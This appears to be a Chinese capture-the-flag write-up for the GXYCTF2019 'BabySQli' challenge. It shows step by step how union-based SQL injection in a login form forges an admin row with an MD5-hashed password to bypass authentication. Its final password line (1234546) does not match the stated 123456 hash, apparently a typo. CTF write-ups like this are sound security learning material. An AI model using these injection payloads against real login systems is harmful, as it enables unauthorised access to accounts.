时间:2021-07-01 10:21:17 帮助过:32人阅读
先随便登陆几个账号,admin的时候提示密码错误
在账号输入框里输入个单引号报错
小字典跑一下,419的都是被过滤了
admin‘ union select 1,2,3#
#返回pass不正确,说明有三个字段
有个靠脑洞的地方,在返回的页面源码中,有串字符串,先base32解密再base64解密,得到了这个
‘ union select 1,‘admin‘,3#
#因为三个字段,猜测应该是id,username,password之类的
#把第二个字段换成存在的admin用户,返回pass错误
#说明第二个字段确实是用户名,那么之前的猜测应该也没有问题了
当查询的数据不存在的时候,联合查询就会构造一个虚拟的数据
#password字段用md5加密的确实没想到,也没找到相关的提示
‘union select 1,‘admin‘,‘e10adc3949ba59abbe56e057f20f883e‘#
#构造一个密码为123456的admin用户
payload:
username: ‘union select 1,‘admin‘,‘e10adc3949ba59abbe56e057f20f883e‘#
password:1234546
[GXYCTF2019]BabySQli
标签:pass 地方 ima name 一个 相关 引号 解密 inf